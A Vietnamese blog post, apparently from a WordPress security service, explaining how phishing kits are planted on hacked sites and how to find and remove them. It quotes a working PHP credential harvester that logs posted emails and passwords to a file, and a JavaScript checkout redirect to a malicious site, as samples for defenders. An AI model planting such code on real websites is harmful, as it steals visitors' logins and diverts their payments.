Cách xóa mã độc lừa đảo từ trang WordPress

Phishing là một mã độc hại được dùng để lấy thông tin nhạy cảm như tên người dùng, mật khẩu, thông tin thẻ tín dụng thông qua một email phối hợp và chiến dịch dựa trên web. Chúng bắt đầu bằng các tin nhắn lừa đảo (email, tin nhắn văn bản hoặc liên lạc điện tử khác) được gửi đến nạn nhân với các liên kết kết thúc trên các trang web bị tấn công. Các thông tin nhạy cảm sau đó được thu thập và gửi cho hacker.

Làm sao biết trang web của bạn có bị nhiễm hay không?

Các tệp lừa đảo thường không được chủ sở hữu trang web chú ý ngay lập tức vì chúng không được bao gồm trong các tệp trang web thông thường. Bạn có thể truy cập trang web và thông thường bạn sẽ không bao giờ nhận thấy hoạt động lừa đảo trong trang web của mình. Hầu hết chủ sở hữu trang web không biết rằng họ có các tệp lừa đảo trên trang web của họ cho đến khi chúng được kích hoạt với các cảnh báo xuất hiện.

Tìm và xóa trang bị nhiễm độc

Không đơn giản để xóa các tệp có chứa mã độc, vì cần yêu cầu phân tích mã web. Các hoạt động này hiếm khi được tìm thấy trên cơ sở dữ liệu của bạn và là các tệp độc lập được đặt trong các thư mục hệ thống quản lý nội dung của bạn.

Vì mục đích là sao chép thông tin tài khoản nhạy cảm như thông tin ngân hàng hoặc trang web thương mại điện tử, các tên tệp lừa đảo thường bị che dấu một cách khéo léo. Các tệp hình ảnh thường được bao gồm và có các định danh thương hiệu nhận dạng trực quan. Ví dụ, thường có các tệp favicon (*.ico) hoặc trang web thương mại điện tử. Đôi khi, một hoạt động lừa đảo là cho một nguồn đáng tin cậy từ nước ngoài, chẳng hạn như một ngân hàng ở bên kia thế giới, và có thể không được nhận ra ngay lập tức.

Cách dễ nhất để tìm một hoạt động lừa đảo là tải xuống các tệp của trang web về máy tính để phân tích. Các tệp lừa đảo thường được nhóm lại với nhau, nhưng có thể phát sinh nhiều tệp bị nhiễm trên một trang web. Chúng thường được chứa trong một thư mục, thường được đặt tên theo cách xác định thực thể mà chúng đang mô phỏng. Đối với ngân hàng, đó có thể là tên của ngân hàng hoặc sử dụng một số định danh khác tương tự như kiểu tấn công lừa đảo (ví dụ: password-reset, customer-information, banking-password).

Khi bạn đã xác định và xóa một tập hợp các tệp có chứa mã độc, hãy tìm những trang khác vì một trang bị xâm nhập có thể là cơ sở cho nhiều hoạt động lừa đảo khác.

Dưới đây là một số mẫu từ một hoạt động lừa đảo. Thường có rất nhiều tệp, nhưng đây là tệp thu thập dữ liệu. Các tập tin có thể hoặc không bị che khuất (mã nguồn thường cố ý bị che dấu với mục đích mơ hồ).

<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["Email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle) ; header("Location:https://www.[redacted].com/accounts/ServiceLoginAuth"); exit; ?> </body> </html>

Ngoài ra còn có một tệp liên quan, password.txt, thu thập dữ liệu đầu vào của người bị lừa đảo.

Hoạt động lừa đảo cũng có thể được chèn vào các trang giỏ hàng khi chuyển hướng javascript gửi khách hàng đến một trang web độc hại trong quá trình thanh toán.

<script>document.location="http://[redacted].com/Checkout"</script>

Chúng tôi thường tìm thấy các trang lừa đảo có tệp .htaccess chặn lập chỉ mục bởi các công cụ tìm kiếm, trình quét phần mềm độc hại và thậm chí một số nhà cung cấp dịch vụ lưu trữ.

Kết luận

Các trang lừa đảo được sử dụng trong việc khai thác một số lỗ hổng trên trang web, thông qua các cửa, mã trang web chưa được vá hoặc tài khoản quản trị, FTP hoặc các tài khoản khác bị xâm phạm.

Nếu bạn tìm thấy các trang lừa đảo trên trang web của mình, điều quan trọng là xác định cách các trang đó được đặt. Có thể có các loại phần mềm độc hại hoặc lỗ hổng bảo mật khác trên trang web của bạn cho phép kẻ tấn công có quyền truy cập.

Sau khi đọc hướng dẫn này, bạn không chắc chắn về cách xóa trang lừa đảo, không chắc bạn đã xóa hết hay nếu bạn đang tìm kiếm câu trả lời khác về cách các trang lừa đảo + mã độc tấn công được đặt trên trang web của bạn, hãy liên hệ với chúng tôi.

Xem hướng dẫn các bước bảo mật cho WordPress

Nếu bạn thấy bài viết này hữu ích, hãy chia sẻ với bạn bè bằng cách nhấn nút chia sẻ ở bên dưới. Theo dõi chúng tôi trên Twitter và Facebook